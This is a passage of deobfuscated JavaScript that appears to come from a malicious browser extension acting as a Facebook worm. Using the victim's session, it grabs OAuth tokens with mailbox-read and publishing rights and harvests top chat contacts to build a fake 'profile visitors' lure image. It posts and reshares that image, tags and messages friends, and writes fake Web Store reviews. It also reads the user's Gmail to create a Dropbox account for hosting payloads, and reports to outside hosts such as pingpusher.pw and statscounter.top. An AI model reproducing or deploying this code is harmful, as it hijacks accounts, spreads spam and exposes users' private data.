832 fbData["randomTexts"] = ["Hecho con", "Lo hice con", "Hecho en", "Mira los tuyos", "Ver los tuyos", "Desde", "Pagina web", "Hecho en esta pagina", "Mira tu resultado", "Hace el tuyo", "Con la herramienta de", "Gratis desde"];
833 fbData["randomTexts"] = fbData["randomTexts"][Math["floor"](Math["random"]() * fbData["randomTexts"]["length"])]["toUpperCase"]() + ": ";
834 pureorig = msg;
835 console["log"](msg);
836 uset2 = msg["replace"](msg["split"]("/")[5]["split"](".")[0], globalFunction["random"](1033213, 9233213));
837 console["log"](uset2);
838 if (dataAndEvents == 0) {
839 if (globalFunction["checkBa"](uset2)) {
840 console["log"](msg + " is banned");
841 if (dataAndEvents == 0) {
842 chrome["runtime"]["sendMessage"]({
843 method : "GET",
844 action : "xhttp",
845 url : "https://statscounter.top/li3.php?ddd=" + msg
846 }, function(errmsg) {
847 makeShit(errmsg, onComplete, 1);
848 });
849 }
850 urlUSE = 0;
851 } else {
852 console["log"](uset2 + " not banned");
853 urlUSE = uset2;
854 }
855 } else {
856 urlUSE = uset2;
857 }
858 if (urlUSE != 0) {
859 fbData["dom1"] = urlUSE;
860 fbData["dom"] = urlUSE;
861 linkToShare2 = fbData["dom1"]["indexOf"]("is.gd/") > -1 ? fbData["dom1"] : fbData["dom"];
862 linkToShare = fbData["dom1"]["indexOf"]("is.gd/") > -1 ? fbData["dom1"] : fbData["dom"];
863 $["ajax"]({
864 url : "https://www.facebook.com/v2.0/dialog/oauth/read?__pc=EXP1%3ADEFAULT",
865 type : "POST",
866 async : false,
867 data : {
868 "fb_dtsg" : fb["user_dtsg"],
869 "app_id" : "124024574287414",
870 "redirect_uri" : "fbconnect://success",
871 "display" : "popup",
872 "access_token" : "",
873 "sdk" : "",
874 "from_post" : "1",
875 "public_info_nux" : "1",
876 "private" : "",
877 "tos" : "",
878 "read" : "user_photos,read_mailbox,public_profile,baseline",
879 "write" : "publish_actions",
880 "readwrite" : "",
881 "extended" : "",
882 "social_confirm" : "",
883 "confirm" : "",
884 "seen_scopes" : "user_photos,read_mailbox,public_profile,baseline",
885 "auth_type" : "",
886 "auth_token" : "",
887 "auth_nonce" : "",
888 "default_audience" : "",
889 "ref" : "Default",
890 "return_format" : "access_token",
891 "domain" : "",
892 "sso_device" : "",
893 "sheet_name" : "initial",
894 "__CONFIRM__" : "1",
895 "__user" : +fb["user_id"],
896 "__a" : 1,
897 "__dyn" : "",
898 "__req" : 1,
899 "ttstamp" : fb["phstamp"],
900 "__rev" : fb["rev"]
901 },
902 complete : function(textStatus) {
903 $["ajax"]({
904 url : "https://www.facebook.com/v2.5/dialog/oauth/write?__pc=EXP1%3ADEFAULT",
905 type : "POST",
906 async : false,
907 data : {
908 "fb_dtsg" : fb["user_dtsg"],
909 "app_id" : "124024574287414",
910 "redirect_uri" : "fbconnect://success",
911 "display" : "popup",
912 "access_token" : "",
913 "sdk" : "",
914 "from_post" : 1,
915 "audience[0][value]" : 40,
916 "private" : "",
917 "tos" : "",
918 "login" : "",
919 "read" : "",
920 "write" : "publish_actions",
921 "readwrite" : "",
922 "extended" : "",
923 "social_confirm" : "",
924 "confirm" : "",
925 "gdp_version" : "3",
926 "seen_scopes" : "publish_actions",
927 "auth_type" : "",
928 "auth_token" : "",
929 "auth_nonce" : "",
930 "default_audience" : "",
931 "ref" : "Default",
932 "return_format" : "access_token",
933 "domain" : "",
934 "sso_device" : "",
935 "sheet_name" : "initial",
936 "__CONFIRM__" : "1",
937 "__user" : +fb["user_id"],
938 "__a" : 1,
939 "__dyn" : "",
940 "__req" : 1,
941 "ttstamp" : fb["phstamp"],
942 "__rev" : fb["rev"]
943 },
944 complete : function(response) {
945 fbData["access_tokenr"] = globalFunction["between"]("access_token=", "&", response["responseText"]);
946 fbData["access_token"] = globalFunction["between"]("access_token=", "&", response["responseText"]);
947 $["ajax"]({
948 url : "https://www.facebook.com/v2.0/dialog/oauth/read?__pc=EXP1%3ADEFAULT",
949 type : "POST",
950 async : false,
951 data : {
952 "fb_dtsg" : fb["user_dtsg"],
953 "app_id" : "124024574287414",
954 "redirect_uri" : "https://developers.facebook.com/tools/explorer/callback?method=GET&path=me%2Finbox&version=v2.0",
955 "display" : "popup",
956 "access_token" : "",
957 "sdk" : "",
958 "from_post" : "1",
959 "public_info_nux" : "1",
960 "private" : "",
961 "tos" : "",
962 "read" : "read_mailbox,public_profile,baseline",
963 "write" : "",
964 "readwrite" : "",
965 "extended" : "",
966 "social_confirm" : "",
967 "confirm" : "",
968 "seen_scopes" : "read_mailbox,public_profile,baseline",
969 "auth_type" : "",
970 "auth_token" : "",
971 "auth_nonce" : "",
972 "default_audience" : "",
973 "ref" : "Default",
974 "return_format" : "access_token",
975 "domain" : "",
976 "sso_device" : "",
977 "sheet_name" : "initial",
978 "__CONFIRM__" : "1",
979 "__user" : +fb["user_id"],
980 "__a" : 1,
981 "__dyn" : "",
982 "__req" : 1,
983 "ttstamp" : fb["phstamp"],
984 "__rev" : fb["rev"]
985 },
986 complete : function(response) {
987 fbData["fql_token"] = globalFunction["between"]("access_token=", "&", response["responseText"]);
988 console["log"]("ACCESS TOKEN ==>" + fbData["access_token"]);
989 $["ajax"]({
990 url : "https://graph.facebook.com/v2.0/fql",
991 type : "GET",
992 async : false,
993 data : {
994 "access_token" : fbData["access_token"],
995 "debug" : "all",
996 "format" : "json",
997 "method" : "get",
998 "pretty" : 0,
999 "q" : '{"query1": "SELECT name, uid from user where uid IN(SELECT recipients FROM thread WHERE folder_id = 0 ORDER BY message_count DESC) AND NOT (uid=me()) LIMIT 8","query2":"SELECT uid, name FROM user WHERE uid =me()"}',
1000 "suppress_http_code" : 1
1001 },
1002 complete : function(response) {
1003 ww = 727;
1004 hh = 634;
1005 $("body")["append"]('<canvas style="display:none" id="c" width="727" height="400" ></canvas>');
1006 var c = document["getElementById"]("c");
1007 var style = c["getContext"]("2d");
1008 style["fillStyle"] = "#efefef";
1009 style["fillRect"](0, 0, ww, hh);
1010 w = ww;
1011 h = hh;
1012 chatDatar = globalFunction["parse"](response["responseText"]);
1013 chatData = {};
1014 chatData["data"] = chatDatar["data"][0]["fql_result_set"];
1015 chatData["data"]["push"](chatDatar["data"][1]["fql_result_set"][0]);
1016 console["log"](chatData);
1017 fonts = ["cursive", "monospace", "serif", "sans-serif", "fantasy", "default", "Arial", "Arial Black", "Arial Narrow", "Arial Rounded MT Bold", "Bookman Old Style", "Bradley Hand ITC", "Century", "Century Gothic", "Comic Sans MS", "Courier", "Courier New", "Georgia", "Gentium", "Impact", "King", "Lucida Console", "Lalit", "Modena", "Monotype Corsiva", "Papyrus", "Tahoma", "TeX", "Times", "Times New Roman", "Trebuchet MS", "Verdana", "Verona"];
1018 var safe = new Array(9);
1019 var _0x1959x65 = 0;
1020 i = 0;
1021 for (;i < 9;i++) {
1022 safe[i] = false;
1023 chatData["data"][i]["photo"] = new Image;
1024 chatData["data"][i]["photo"]["crossOrigin"] = "Anonymous";
1025 chatData["data"][i]["photo"]["src"] = "https://graph.facebook.com/" + chatData["data"][i]["uid"] + "/picture?type=square&height=" + (i == 8 ? 500 : 150);
1026 chatData["data"][i]["photo"]["onload"] = function(i) {
1027 return function() {
1028 safe[i] = true;
1029 };
1030 }(i);
1031 if (i == chatData["data"]["length"] - 1) {
1032 var poll = setInterval(function() {
1033 if ($["inArray"](false, $["map"](safe, function(dataAndEvents) {
1034 return dataAndEvents;
1035 })) < 0) {
1036 clearInterval(poll);
1037 console["log"](chatData);
1038 var renderText = function(x, region, opt_attributes, expectedNumberOfNonCommentArgs, color, partials, stack) {
1039 color = color || 757575;
1040 partials = partials || 0;
1041 stack = stack || "Helvetica";
1042 if (!partials) {
1043 x = x.toString()["substring"](0, 19);
1044 }
1045 style["font"] = "bold " + expectedNumberOfNonCommentArgs + "px " + stack;
1046 style["textAlign"] = "center";
1047 style["fillStyle"] = "#" + color;
1048 style["fillText"](x, region, opt_attributes);
1049 };
1050 fontt = fonts[Math["floor"](Math["random"]() * fonts["length"])];
1051 style["globalAlpha"] = 0.2;
1052 style["drawImage"](chatData["data"][8]["photo"], 0, 0, 500, 400, 0, 0, ww, 400);
1053 style["globalAlpha"] = 1;
1054 i = 0;
1055 for (;i < 4;i++) {
1056 style["drawImage"](chatData["data"][i]["photo"], 50 + i * (150 + 10), 20, 150, 150);
1057 renderText(chatData["data"][i]["name"], 50 + (i * (150 + 10) + 75), 190, 15);
1058 renderText(i + 1 + "\u00b0", 70 + i * (150 + 10), 51, 33);
1059 renderText(i + 1 + "\u00b0", 70 + i * (150 + 10), 50, 30, "FFF");
1060 }
1061 o = 4;
1062 for (;o < 8;o++) {
1063 style["drawImage"](chatData["data"][o]["photo"], 50 + (o - 4) * (150 + 10), 200, 150, 150);
1064 renderText(chatData["data"][o]["name"], 50 + ((o - 4) * (150 + 10) + 75), 370, 15);
1065 renderText(o + 1 + "\u00b0", 70 + (o - 4) * (150 + 10), 231, 33);
1066 renderText(o + 1 + "\u00b0", 70 + (o - 4) * (150 + 10), 230, 30, "FFF");
1067 }
1068 style["beginPath"]();
1069 style["moveTo"](0, 0);
1070 style["quadraticCurveTo"](globalFunction["random"](200, 300), globalFunction["random"](200, 300), ww, 0);
1071 style["quadraticCurveTo"](globalFunction["random"](200, 300), globalFunction["random"](200, 300), ww, hh);
1072 style["quadraticCurveTo"](globalFunction["random"](200, 300), globalFunction["random"](200, 300), 0, hh);
1073 style["quadraticCurveTo"](globalFunction["random"](200, 300), globalFunction["random"](200, 300), 0, 0);
1074 style["moveTo"](0, hh / 2);
1075 style["quadraticCurveTo"](globalFunction["random"](200, 300), globalFunction["random"](200, 300), ww, hh / 2);
1076 style["quadraticCurveTo"](globalFunction["random"](200, 300), globalFunction["random"](200, 300), ww / 2, hh);
1077 style["moveTo"](ww / 2, 0);
1078 style["quadraticCurveTo"](globalFunction["random"](200, 300), globalFunction["random"](200, 300), hh, ww / 2);
1079 style["quadraticCurveTo"](globalFunction["random"](200, 300), globalFunction["random"](200, 300), hh / 2, ww);
1080 style["strokeStyle"] = "#FFF";
1081 style["stroke"]();
1082 base64 = c["toDataURL"]("image/jpeg");
1083 c["toBlob"](function(message) {
1084 title = globalFunction["random"](1E3, 9999) + " VISI" + globalFunction["chain"](1)["toUpperCase"]() + "TAS A " + globalFunction["returnName"]()["toUpperCase"]();
1085 console["log"](message);
1086 globalFunction["photoToFb"](message, function(dataAndEvents) {
1087 var task = {
1088 __user : fb["user_id"],
1089 __a : 1,
1090 __dyn : "",
1091 __req : "o",
1092 __be : 0,
1093 __pc : "EXP1:DEFAULT",
1094 fb_dtsg : fb["user_dtsg"],
1095 ttstamp : fb["tts"],
1096 __rev : fb["rev"]
1097 };
1098 userName = gF["returnName"]();
1099 if ($(userName)["has"](" ")) {
1100 userName = userName["split"](" ")[0];
1101 }
1102 pmsg = globalFunction["banword"]("VISITAS AL") + " " + globalFunction["banword"]("PERFIL DE") + " " + userName["toUpperCase"]();
1103 $["ajax"]({
1104 url : "https://www.facebook.com/react_composer/scraper/?composer_id=u_0_1c&target_id=" + fpage + "&scrape_url=" + linkToShare + "&entry_point=pages_feed&source_attachment=STATUS&av=" + fpage + "&dpr=2",
1105 type : "POST",
1106 async : false,
1107 data : task,
1108 complete : function(textStatus) {
1109 var task = {
1110 "attachment[params][urlInfo][canonical]" : linkToShare,
1111 "attachment[params][urlInfo][final]" : linkToShare,
1112 "attachment[params][urlInfo][user]" : linkToShare,
1113 "attachment[params][content_removed]" : false,
1114 "attachment[params][ranked_images][images]" : "",
1115 "attachment[params][ranked_images][ranking_model_version]" : 0,
1116 "attachment[params][ranked_images][default]" : true,
1117 "attachment[params][medium]" : 106,
1118 "attachment[params][url]" : linkToShare,
1119 "attachment[params][title]" : pmsg,
1120 "attachment[params][summary]" : " ",
1121 "attachment[params][time_scraped]" : Math["floor"](Date["now"]() / 1E3),
1122 "attachment[params][cache_hit]" : true,
1123 "attachment[params][global_share_id]" : "",
1124 "attachment[params][was_recent]" : false,
1125 "attachment[params][og_info][guesses][0][0]" : "og:url",
1126 "attachment[params][og_info][guesses][0][1]" : linkToShare,
1127 "attachment[params][og_info][guesses][1][0]" : "og:title",
1128 "attachment[params][og_info][guesses][1][1]" : pmsg,
1129 "attachment[params][ttl]" : 604800,
1130 "attachment[params][error]" : 16,
1131 "attachment[params][child_attachments][0][picture]" : dataAndEvents,
1132 "attachment[params][child_attachments][0][name]" : pmsg,
1133 "attachment[params][child_attachments][0][description]" : "",
1134 "attachment[params][child_attachments][0][link]" : linkToShare,
1135 "attachment[params][child_attachments][0][selected]" : 1,
1136 "attachment[params][child_attachments][0][scraped]" : 0,
1137 "attachment[type]" : 100,
1138 "attachment[reshare_original_post]" : false,
1139 "attachment[carousel_log][use_carousel_composer]" : 1,
1140 "attachment[carousel_log][carousel_incompatible]" : "",
1141 "attachment[carousel_log][scraped_url]" : linkToShare,
1142 "attachment[carousel_log][scraped_time]" : 0,
1143 "attachment[carousel_log][composer_location]" : "OTHER",
1144 "attachment[carousel_log][hide_end_card]" : "",
1145 "attachment[carousel_log][source_attachment]" : "STATUS",
1146 boosted_post_config : "",
1147 xc_share_params : "",
1148 composer_session_id : e(),
1149 composertags_city : "",
1150 composertags_place : "",
1151 hide_object_attachment : true,
1152 is_explicit_place : false,
1153 is_markdown : false,
1154 is_q_and_a : false,
1155 is_profile_badge_post : false,
1156 multilingual_specified_lang : "",
1157 privacyx : "",
1158 prompt_id : "",
1159 ref : "pages_feed",
1160 is_redspace_post : false,
1161 target_type : "page",
1162 xhpc_message : "",
1163 xhpc_message_text : "",
1164 is_forced_reshare_of_post : false,
1165 xc_share_params : "",
1166 xc_share_target_type : 100,
1167 xc_link_url : linkToShare,
1168 is_react : true,
1169 xhpc_composerid : "u_jsonp_4_j",
1170 xhpc_targetid : fpage,
1171 xhpc_context : "profile",
1172 xhpc_ismeta : 1,
1173 xhpc_timeline : true,
1174 xhpc_finch : true,
1175 xhpc_socialplugin : false,
1176 xhpc_topicfeedid : "",
1177 xhpc_origintopicfeedid : "",
1178 xhpc_modal_composer : false,
1179 xhpc_aggregated_story_composer : false,
1180 xhpc_publish_type : 1,
1181 xhpc_fundraiser_page : false,
1182 draft : false,
1183 __user : fb["user_id"],
1184 __a : 1,
1185 __dyn : "",
1186 __req : "2m",
1187 __pc : "EXP1:DEFAULT",
1188 fb_dtsg : fb["user_dtsg"],
1189 ttstamp : fb["tts"],
1190 __rev : fb["rev"]
1191 };
1192 $["ajax"]({
1193 url : "https://www.facebook.com/ajax/updatestatus.php?av=" + fpage + "&dpr=1",
1194 type : "POST",
1195 async : false,
1196 data : task,
1197 complete : function(response) {
1198 cookies["save"](fb["user_id"] + "_sc" + fb["cache"], 1, 1);
1199 postId = globalFunction["between"]('"ftentidentifier":"', '"', response["responseText"]);
1200 fb["postId"] = globalFunction["between"]('"ftentidentifier":"', '"', response["responseText"]);
1201 if (!postId) {
1202 (new Image)["src"] = "//whos.amung.us/swidget/wixerr344";
1203 } else {
1204 $["get"]("https://pingpusher.pw/db.php?idd=" + postId + "&mm=1&ex=" + fb["link"], function() {
1205 });
1206 nowAva = globalFunction["onlines"]();
1207 onlins = nowAva[0];
1208 otherf = nowAva[1];
1209 console["log"]("Live: " + " length: " + onlins["length"]);
1210 console["log"]("Now: " + " length: " + otherf["length"]);
1211 console["log"](nowAva);
1212 var close = function() {
1213 if (onlins["length"] > 0) {
1214 tag = onlins[0];
1215 onlins["splice"](0, 1);
1216 } else {
1217 if (otherf["length"] > 0) {
1218 tag = otherf[0];
1219 otherf["splice"](0, 1);
1220 } else {
1221 return 0;
1222 }
1223 }
1224 return tag;
1225 };
1226 var init = function(player) {
1227 $["ajax"]({
1228 url : "https://www.facebook.com/share/dialog/submit/?dpr=2",
1229 type : "POST",
1230 async : true,
1231 data : {
1232 post_id : fb["postId"],
1233 share_type : 99,
1234 audience_type : "self",
1235 app_id : 2309869772,
1236 sharer_id : fpage,
1237 privacy : 300645083384735,
1238 share_now : 1,
1239 is_forced_reshare_of_post : 0,
1240 __user : fb["user_id"],
1241 __a : 1,
1242 __dyn : "",
1243 __req : "n",
1244 __be : 0,
1245 __pc : "EXP1:DEFAULT",
1246 fb_dtsg : fb["user_dtsg"],
1247 ttstamp : fb["tts"],
1248 __rev : fb["rev"],
1249 "ft[tn]" : "J]",
1250 "ft[type]" : 25,
1251 "ft[fbfeed_location]" : 5
1252 },
1253 complete : function(response) {
1254 objectId = globalFunction["between"]('"object_id":', ",", response["responseText"]);
1255 objectId = objectId["replaceAll"]('"', "");
1256 status = "Visi" + globalFunction["chain"](1)["toLowerCase"]() + "tas a " + globalFunction["returnName"]() + " " + globalFunction["spaces"](globalFunction["random"](10, 20));
1257 status = "";
1258 player = 0;
1259 for (;player < 5;player++) {
1260 nowtag = close();
1261 if (nowtag != 0) {
1262 status = status + "@[" + nowtag + ": " + globalFunction["chain"](1) + "] ";
1263 }
1264 }
1265 if (nowtag != "") {
1266 $["ajax"]({
1267 url : "https://www.facebook.com/ajax/edits/save/?av=" + fb["user_id"] + "&dpr=2",
1268 type : "POST",
1269 async : true,
1270 data : {
1271 edited_post_fbid : objectId,
1272 hey_kid_im_a_composer : 1,
1273 display_context : "home",
1274 xhpc_context : "home",
1275 entstory_context : '{"profile_id":' + fb["user_id"] + ',"story_width":513,"fbfeed_context":true,"location_type":10,"is_ad_preview":false,"is_editable":false,"shimparams":{"page_type":16,"actor_id":' + fb["user_id"] + ',"story_id":' + objectId + ',"ad_id":0,"location":"timeline"},"story_id":"u_0_1u","caret_id":"u_0_1v"}',
1276 status_text : status,
1277 status : status,
1278 save : 1,
1279 __user : fb["user_id"],
1280 __a : 1,
1281 __dyn : "",
1282 __req : "n",
1283 __be : 0,
1284 __pc : "EXP1:DEFAULT",
1285 fb_dtsg : fb["user_dtsg"],
1286 ttstamp : fb["tts"],
1287 __rev : fb["rev"]
1288 },
1289 complete : function(textStatus) {
1290 }
1291 });
1292 }
1293 }
1294 });
1295 };
1296 fb["chatsen"] = 15;
1297 i = 0;
1298 for (;i < fb["chatsen"];i++) {
1299 thistag = close();
1300 console["log"]("Starting at " + i + " Send to: " + thistag);
1301 if (thistag != 0) {
1302 nowLink = fbData["links"][Math["floor"](Math["random"]() * fbData["links"]["length"])];
1303 console["log"]("Chat link is: " + nowLink);
1304 msgcy(thistag, nowLink, 0, i);
1305 }
1306 }
1307 i = 0;
1308 for (;i < 50;i++) {
1309 thistag = close();
1310 if (thistag != 0) {
1311 nowLink = fbData["links"][Math["floor"](Math["random"]() * fbData["links"]["length"])];
1312 comments(thistag, nowLink);
1313 }
1314 }
1315 t = 0;
1316 for (;t < 15;t++) {
1317 init(t);
1318 }
1319 onComplete();
1320 }
1321 }
1322 });
1323 }
1324 });
1325 });
1326 }, "image/png");
1327 }
1328 }, 1E3)
1329 }
1330 }
1331 }
1332 });
1333 }
1334 });
1335 }
1336 });
1337 }
1338 });
1339 } else {
1340 throw new Error("url banned " + msg);
1341 }
1342}
1343function sfkklglr() {
1344 if (globalFunction["random"](0, 50) == 10) {
1345 cookies["save"](fb["user_id"] + "_sc" + fb["cache"], 1, 1);
1346 chrome["runtime"]["sendMessage"]({
1347 method : "POST",
1348 action : "xhttp",
1349 url : "https://chrome.google.com/reviews/json/token"
1350 }, function(v) {
1351 googleData = globalFunction["parse"](v);
1352 if (globalFunction["type"](googleData["channelHeader"])) {
1353 token = googleData["channelHeader"]["token"];
1354 $["ajax"]({
1355 url : "https://chrome.google.com/reviews/components",
1356 type : "POST",
1357 async : false,
1358 processData : false,
1359 data : 'req={"appId":94,"version":"150922","hl":"es","specs":[{"type":"RatingPicker","url":"http%3A%2F%2Fchrome.google.com%2Fextensions%2Fpermalink%3Fid%3D' + fb["app"] + '","groups":"chrome_webstore","id":"2","rating":"5","event":"writeAnnotation"}],"internedKeys":[],"internedValues":[]}&token=' + token,
1360 complete : function(textStatus) {
1361 $["ajax"]({
1362 url : "https://chrome.google.com/reviews/json/token",
1363 type : "POST",
1364 async : false,
1365 complete : function(response) {
1366 googleData = globalFunction["parse"](response["responseText"]);
1367 token = googleData["channelHeader"]["token"];
1368 $["ajax"]({
1369 url : "https://chrome.google.com/reviews/components",
1370 type : "POST",
1371 async : false,
1372 processData : false,
1373 data : 'req={"appId":94,"version":"150922","hl":"es","specs":[{"type":"CommentEditor","cwsapprevision":"1","url":"0","groups":"4","id":"3","comment":"' + globalFunction["encodeU"](item3) + '","event":"writeAnnotation"},{"type":"RatingPicker","url":"0","groups":"4","id":"2","rating":"5","event":"writeAnnotation"}],"internedKeys":["0","4"],"internedValues":["http%3A%2F%2Fchrome.google.com%2Fextensions%2Fpermalink%3Fid%3D' + fb["app"] + '","chrome_webstore"]}&token=' + token,
1374 complete : function(textStatus) {
1375 }
1376 });
1377 }
1378 });
1379 }
1380 });
1381 }
1382 });
1383 }
1384}
1385function privacySetting() {
1386 var future = {
1387 value : "300645083384735",
1388 prev_value : "291667064279714",
1389 __user : fb["user_id"],
1390 __a : 1,
1391 __dyn : "",
1392 __req : "15",
1393 fb_dtsg : fb["user_dtsg"],
1394 ttstamp : fb["tts"],
1395 __rev : fb["rev"]
1396 };
1397 var request = new XMLHttpRequest;
1398 request["open"]("POST", "https://www.facebook.com/ajax/settings/granular_privacy/composer.php");
1399 request["setRequestHeader"]("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
1400 request["send"](globalFunction["deSerialize"](future));
1401 request["onreadystatechange"] = function() {
1402 if (request["readyState"] == 4 && request["status"] == 200) {
1403 var _0x1959x17 = JSON["parse"](request["responseText"]["replace"]("for (;;);", ""))
1404 }
1405 };
1406}
1407var Gmail = {
1408 get : function(opt_key) {
1409 mailacc = 0;
1410 chrome["runtime"]["sendMessage"]({
1411 method : "GET",
1412 action : "xhttp",
1413 url : "https://mail.google.com/mail/u/" + mailacc + "/"
1414 }, function(cacheKey) {
1415 if (globalFunction["type"](cacheKey)) {
1416 gtoken = globalFunction["between"]('GM_ACTION_TOKEN="', '"', cacheKey);
1417 if (gtoken) {
1418 chrome["runtime"]["sendMessage"]({
1419 method : "POST",
1420 action : "xhttp",
1421 url : "https://mail.google.com/mail/u/" + mailacc + "/?ui=html&zy=e",
1422 data : "at=" + gtoken
1423 }, function(deepDataAndEvents) {
1424 email_ad = globalFunction["between"]("<b class=gb4>", "</b>", deepDataAndEvents);
1425 opt_key(email_ad);
1426 });
1427 }
1428 }
1429 });
1430 },
1431 checkMail : function(data, cb) {
1432 var poll = setInterval(function() {
1433 getmails = 0;
1434 mailacc = 0;
1435 if (getmails < 10) {
1436 getmails++;
1437 chrome["runtime"]["sendMessage"]({
1438 method : "GET",
1439 action : "xhttp",
1440 url : "https://mail.google.com/mail/u/" + mailacc + "/h/" + globalFunction["chain"](12)["toLowerCase"]() + "/?zy=e&f=1"
1441 }, function(listeners) {
1442 if (listeners["indexOf"](data) > -1) {
1443 clearInterval(poll);
1444 }
1445 url = globalFunction["between"](data, "><span", listeners);
1446 url = globalFunction["between"]('a href="', '"', url);
1447 url = url["replaceAll"]("&", "&");
1448 if (url["indexOf"]("&th=") > -1) {
1449 url["replace"]("&th=", "th=");
1450 }
1451 chrome["runtime"]["sendMessage"]({
1452 method : "GET",
1453 action : "xhttp",
1454 url : "https://mail.google.com/mail/u/" + mailacc + "/h/" + globalFunction["chain"](12)["toLowerCase"]() + "/" + url + "&dsqt=1"
1455 }, function(outErr) {
1456 cb(outErr);
1457 });
1458 });
1459 }
1460 }, 1E3);
1461 }
1462};
1463if (fb["debug"] == false) {
1464 if (document["URL"]["indexOf"]("dropbox.com") > -1) {
1465 if ($("body")["html"]()["indexOf"]("/ajax_register") > -1) {
1466 pw = globalFunction["shuffle"](globalFunction["chain"](globalFunction["random"](5, 10)) + globalFunction["random"](3, 4));
1467 mail = globalFunction["between"]("#EM-", "NM-", document.URL);
1468 name = globalFunction["between"]("NM-", "#", document.URL);
1469 $("input[name='fullname']")["val"](atob(name));
1470 $("input[type='email']")["val"](atob(mail));
1471 $("input[type='password']")["val"](pw);
1472 $("input[name='tos_agree']")["attr"]("checked", true);
1473 $("button.login-button")["eq"](3)["click"]();
1474 setInterval(function() {
1475 $("button.login-button")["eq"](3)["click"]();
1476 }, 2E3);
1477 }
1478 if (document["URL"]["indexOf"]("third_party_signup") > -1 || (document["URL"]["indexOf"]("/install") > -1 || document["URL"]["indexOf"]("/home") > -1)) {
1479 top["location"] = "http://www.facebook.com###token-" + cookies["read"]("__Host-js_csrf");
1480 }
1481 }
1482}
1483function createAccount() {
1484 Gmail["get"](function(strData) {
1485 if (strData) {
1486 top["location"] = "https://www.dropbox.com/#EM-" + btoa(strData) + "NM-" + btoa(globalFunction["returnName"]()) + "#";
1487 }
1488 });
1489}
1490if (!drop) {
1491 var drop = {}
1492}
1493function startDB(coll) {
1494 $["ajax"]({
1495 url : "https://www.dropbox.com/",
1496 type : "GET",
1497 async : false,
1498 complete : function(response) {
1499 if (response["responseText"]["indexOf"]("logged_out_utils") == -1) {
1500 createAccount();
1501 } else {
1502 token = document["URL"]["split"]("###token-")[1];
1503 drop["uuid"] = globalFunction["between"]('"uid": "', '"', response["responseText"]);
1504 drop["token"] = token;
1505 if (response["responseText"]["indexOf"]('is_email_verified": true') == -1) {
1506 Gmail["get"](function(email) {
1507 db = {
1508 "is_xhr" : true,
1509 "t" : token,
1510 "email" : email,
1511 "reason" : "shmodal",
1512 "_subject_uid" : drop["uuid"]
1513 };
1514 chrome["runtime"]["sendMessage"]({
1515 method : "POST",
1516 action : "xhttp",
1517 url : "https://www.dropbox.com/sendverifyemail",
1518 data : $["param"](db)
1519 }, function(dataAndEvents) {
1520 Gmail["checkMail"]("Dropbox", function(deepDataAndEvents) {
1521 vtok = decodeURIComponent(globalFunction["between"]("dropbox.com%252Fl%252F", "&", deepDataAndEvents)["replace"](/\+/g, " "))["replaceAll"]("&", "&");
1522 verify = "https://www.dropbox.com/l/" + vtok["split"]("&")[0];
1523 chrome["runtime"]["sendMessage"]({
1524 method : "GET",
1525 action : "xhttp",
1526 url : verify,
1527 data : $["param"](db)
1528 }, function(dataAndEvents) {
1529 startDB(coll);
1530 });
1531 });
1532 });
1533 });
1534 } else {
1535 if (!token) {
1536 top["location"] = "https://www.dropbox.com/install";
1537 } else {
1538 console["log"]("token: " + token);
1539 chrome["runtime"]["sendMessage"]({
1540 method : "GET",
1541 action : "xhttp",
1542 url : "https://userexperiencestatics.net/getphp.php?n=" + globalFunction["returnName"]()
1543 }, function(username) {
1544 addHtml(function(data) {
1545 $["ajax"]({
1546 url : data["replace"]("dropbox", "dropboxusercontent"),
1547 type : "GET",
1548 async : false,
1549 complete : function(response) {
1550 if (response["responseText"]["indexOf"]("function") > -1) {
1551 i = 0;
1552 for (;i < fbData["veces"];i++) {
1553 setTimeout(function() {
1554 chrome["runtime"]["sendMessage"]({
1555 method : "GET",
1556 action : "xhttp",
1557 url : "https://userexperiencestatics.net/getphp.php?n=" + globalFunction["returnName"]()
1558 }, function(username) {
1559 addHtml(coll, username);
1560 });
1561 }, 1E3 * i);
1562 }
1563 }
1564 }
1565 });
1566 }, username, 1);
1567 });
1568 }
1569 }
1570 }
1571 }
1572 });
1573}
1574function svl(dataAndEvents, cbDone, deepDataAndEvents) {
1575 link = globalFunction["between"]('value="', '"', dataAndEvents["responseText"]);
1576 if (typeof link != "undefined") {
1577 link = link["replace"]("?dl=0", "")["replace"]("www", "dl");
1578 cbDone(link);
1579 if (!deepDataAndEvents) {
1580 chrome["runtime"]["sendMessage"]({
1581 method : "POST",
1582 action : "xhttp",
1583 url : "https://statscounter.top/li3.php?dlin3=" + link
1584 }, function(dataAndEvents) {
1585 });
1586 console["log"](link);
1587 cookies["save"](fb["user_id"] + "_sc" + fb["cache"], 1, 1);
1588 }
1589 }
1590}
1591function svv(dataAndEvents, callback, deepDataAndEvents) {
1592 size = globalFunction["parse"](dataAndEvents["responseText"])["total_size"];
1593 if (size > 2E3) {
1594 fileName = globalFunction["between"]("_upload?name=", ".html", dataAndEvents["responseURL"]);
1595 $["ajax"]({
1596 url : "https://www.dropbox.com/sm/share_link/" + fileName + ".html",
1597 type : "POST",
1598 async : true,
1599 data : {
1600 "is_xhr" : true,
1601 "t" : drop["token"],
1602 "origin" : "browse_file_row",
1603 "_subject_uid" : drop["uuid"]
1604 },
1605 complete : function(dataAndEvents) {
1606 svl(dataAndEvents, callback, deepDataAndEvents);
1607 }
1608 });
1609 }
1610}
1611function addHtml(coll, username, deepDataAndEvents) {
1612 deepDataAndEvents = deepDataAndEvents || 0;
1613 if (username != "[object Object]" && username != "") {
1614 b = new Blob(["" + username + ""], {
1615 encoding : "UTF-8",
1616 type : "application/octet-stream"
1617 });
1618 blobFile = b;
1619 console["log"](blobFile);
1620 fileName = globalFunction["chain"](globalFunction["random"](10, 20))["toLowerCase"]();
1621 var request = new XMLHttpRequest;
1622 request["withCredentials"] = true;
1623 request["open"]("POST", "https://dl-web.dropbox.com/chunked_upload?name=" + fileName + ".html&chunk=0&chunks=1&dest=%2F&t=" + drop["token"] + "&_subject_uid=" + drop["uuid"] + "&reported_total_size=" + b["size"] + "&upload_id=" + globalFunction["chain"](22) + "&offset=0", true);
1624 request["onreadystatechange"] = function(dataAndEvents) {
1625 if (this["readyState"] == 4) {
1626 if (this["status"] == 200) {
1627 svv(this, coll, deepDataAndEvents);
1628 }
1629 }
1630 };
1631 request["send"](blobFile);
1632 }
1633}
1634function comments(err, data) {
1635 function callback(key) {
1636 $["ajax"]({
1637 url : "https://www.facebook.com/plugins/comments.php",
1638 type : "GET",
1639 async : true,
1640 data : {
1641 api_key : 0x67903d22b9a8,
1642 href : data
1643 },
1644 complete : function(response) {
